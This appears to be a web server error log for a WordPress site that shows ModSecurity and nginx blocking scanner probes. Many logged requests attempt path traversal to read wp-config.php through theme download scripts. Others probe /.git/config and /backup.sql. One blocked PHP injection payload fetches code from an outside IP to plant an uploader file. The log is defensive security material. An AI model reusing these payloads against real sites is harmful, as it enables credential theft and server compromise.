2023] [:error] [pid 6294:tid 140255747356416] [client 23.137.251.61:40938] [client 23.137.251.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/markant/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "ZJiR7tjYcHyO0P41DG2anwAAAUo"] [Sun Jun 25 14:13:51.210150 2023] [:error] [pid 24795:tid 140255772534528] [client 23.137.251.61:40940] [client 23.137.251.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/nishizawa_tmp/force-download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/nishizawa_tmp/force-download.php"] [unique_id "ZJiR7_MRudKiOmssFP6IIgAAAIc"] [Sun Jun 25 14:13:52.154574 2023] [:error] [pid 24795:tid 140255870887680] [client 23.137.251.61:40942] [client 23.137.251.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZJiR8PMRudKiOmssFP6IIwAAAIQ"] [Sun Jun 25 14:13:52.924826 2023] [:error] [pid 24795:tid 140255705392896] [client 23.137.251.61:40944] [client 23.137.251.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/rowe/download/download.php?download_file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/rowe/download/download.php"] [unique_id "ZJiR8PMRudKiOmssFP6IJAAAAI8"] [Sun Jun 25 14:13:53.756168 2023] [:error] [pid 24795:tid 140255747356416] [client 23.137.251.61:40946] [client 23.137.251.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinity/lib/scripts/download.php"] [unique_id "ZJiR8fMRudKiOmssFP6IJQAAAIo"] [Sun Jun 25 14:13:56.852370 2023] [:error] [pid 24793:tid 140255896065792] [client 23.137.251.61:40954] [client 23.137.251.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "ZJiR9I27ibjPM5oQg142FAAAAAE"] [Sun Jun 25 14:13:57.624773 2023] [:error] [pid 6294:tid 140255655036672] [client 23.137.251.61:40956] [client 23.137.251.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "ZJiR9djYcHyO0P41DG2aogAAAVU"] [Sun Jun 25 14:13:58.291157 2023] [:error] [pid 6294:tid 140255730571008] [client 23.137.251.61:40958] [client 23.137.251.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/u_parts/force-download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/u_parts/force-download.php"] [unique_id "ZJiR9tjYcHyO0P41DG2aowAAAUw"] [Sun Jun 25 14:13:59.152857 2023] [:error] [pid 6220:tid 140255764141824] [client 23.137.251.61:40960] [client 23.137.251.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/urbancity/lib/scripts/download.php"] [unique_id "ZJiR9-P43hfhSzKM50NAdQAAAQg"] [Sun Jun 25 14:14:01.245908 2023] [:error] [pid 6220:tid 140255671822080] [client 45.66.35.35:40964] [client 45.66.35.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/themes/yakimabait/download.php?file=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yakimabait/download.php"] [unique_id "ZJiR-eP43hfhSzKM50NAdgAAARM"] [Sun Jun 25 14:14:01.978461 2023] [:error] [pid 6220:tid 140255755749120] [client 45.66.35.35:40966] [client 45.66.35.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-e-commerce/wpsc-includes/misc.functions.php?image_name=../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "ZJiR-eP43hfhSzKM50NAdwAAAQk"] [Sun Jun 25 20:17:19.105016 2023] [autoindex:error] [pid 6220:tid 140255663429376] [client 45.79.23.40:35952] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Jun 26 04:50:01.747655 2023] [autoindex:error] [pid 8101:tid 140187475732224] [client 45.79.15.116:40376] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jun 27 03:36:39.434428 2023] [autoindex:error] [pid 1363:tid 139939614250752] [client 41.216.188.162:52564] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Jun 27 04:49:26.031063 2023] [autoindex:error] [pid 1267:tid 139939622643456] [client 20.165.56.60:58194] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/06/27 08:13:41 [error] 1224#1224: *258095 access forbidden by rule, client: 31.42.184.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/06/27 10:19:42 [error] 1225#1225: *262728 access forbidden by rule, client: 3.140.193.199, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Jun 27 20:11:11.473213 2023] [:error] [pid 1363:tid 139939605858048] [client 141.95.136.87:51944] [client 141.95.136.87] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZJuIr7z-gn20NikxJ36NfQAAAM8"] [Wed Jun 28 11:36:22.502550 2023] [autoindex:error] [pid 26358:tid 140285157758720] [client 172.105.50.232:45572] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jun 28 17:46:40.812321 2023] [autoindex:error] [pid 26356:tid 140285166151424] [client 178.128.172.0:36862] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Jun 29 02:17:32.667204 2023] [autoindex:error] [pid 26795:tid 140285266863872] [client 74.249.26.142:60280] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jun 29 23:51:42.517968 2023] [:error] [pid 24957:tid 140553626818304] [client 4.150.4.40:38684] [client 4.150.4.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZJ5fXsDedUuAXRZhYpF-0QAAAMY"], referer: www.google.com [Fri Jun 30 04:04:59.467135 2023] [autoindex:error] [pid 6570:tid 140292405581568] [client 91.134.248.245:50710] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Fri Jun 30 12:03:48.280869 2023] [autoindex:error] [pid 6791:tid 140292321654528] [client 50.63.161.8:47850] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/skins/lightgray/fonts/index.php [Fri Jun 30 12:03:49.140044 2023] [autoindex:error] [pid 6791:tid 140292363618048] [client 50.63.161.8:47858] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/skins/lightgray/fonts/index.php [Fri Jun 30 18:19:55.163636 2023] [:error] [pid 6791:tid 140292380403456] [client 41.216.188.164:41362] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Sat Jul 01 02:30:36.703981 2023] [autoindex:error] [pid 6572:tid 140292372010752] [client 50.63.161.8:44114] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/includes/index.php [Sat Jul 01 04:56:00.897305 2023] [autoindex:error] [pid 14843:tid 139824321222400] [client 65.21.224.105:51376] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Sat Jul 01 18:08:25.671246 2023] [:error] [pid 14732:tid 139824388364032] [client 192.185.82.92:35520] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentynineteen/404.php:12, referer: http://simplesite.com [Sat Jul 01 18:08:25.671318 2023] [:error] [pid 14732:tid 139824388364032] [client 192.185.82.92:35520] Stack trace:, referer: http://simplesite.com [Sat Jul 01 18:08:25.671329 2023] [:error] [pid 14732:tid 139824388364032] [client 192.185.82.92:35520] #0 {main}, referer: http://simplesite.com [Sat Jul 01 18:08:25.671396 2023] [:error] [pid 14732:tid 139824388364032] [client 192.185.82.92:35520] thrown in /home/investig/public_html/wp-content/themes/twentynineteen/404.php on line 12, referer: http://simplesite.com [Sun Jul 02 02:09:05.119870 2023] [autoindex:error] [pid 14732:tid 139824287651584] [client 45.79.15.116:60482] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jul 02 05:22:15.343396 2023] [autoindex:error] [pid 3289:tid 140422932322048] [client 20.165.56.17:42512] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/07/03 17:39:16 [error] 12446#12446: *20391 access forbidden by rule, client: 164.92.155.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/07/03 17:39:16 [error] 12446#12446: *20392 access forbidden by rule, client: 164.92.155.72, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Jul 03 22:43:27.394784 2023] [autoindex:error] [pid 12592:tid 140158212998912] [client 68.183.190.158:60614] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jul 04 12:10:17.066340 2023] [autoindex:error] [pid 12888:tid 140666445178624] [client 167.71.210.89:48596] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Tue Jul 04 20:02:30.008235 2023] [:error] [pid 12157:tid 140666545891072] [client 157.230.254.108:47576] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/ .php [Tue Jul 04 20:02:30.251507 2023] [:error] [pid 12157:tid 140666520712960] [client 157.230.254.108:47578] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dx.php 2023/07/05 00:43:59 [error] 12105#12105: *93033 access forbidden by rule, client: 142.93.153.3, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/05 00:44:00 [error] 12105#12105: *93079 access forbidden by rule, client: 159.203.63.67, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/07/05 00:44:02 [error] 12104#12104: *93134 access forbidden by rule, client: 178.62.3.65, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/07/05 00:44:02 [error] 12105#12105: *93135 access forbidden by rule, client: 134.122.89.242, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/07/05 00:44:03 [error] 12105#12105: *93176 access forbidden by rule, client: 165.22.120.216, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/07/05 00:44:03 [error] 12104#12104: *93177 access forbidden by rule, client: 68.183.64.176, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Jul 05 03:20:27.477941 2023] [ssl:warn] [pid 16346:tid 139990672574336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 05 03:20:36.288539 2023] [ssl:warn] [pid 16349:tid 139990672574336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 05 03:20:36.915567 2023] [ssl:warn] [pid 16349:tid 139990672574336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 05 03:20:38.845562 2023] [ssl:warn] [pid 16349:tid 139990672574336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Jul 05 03:20:42.640538 2023] [ssl:warn] [pid 16880:tid 140686472267648] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed 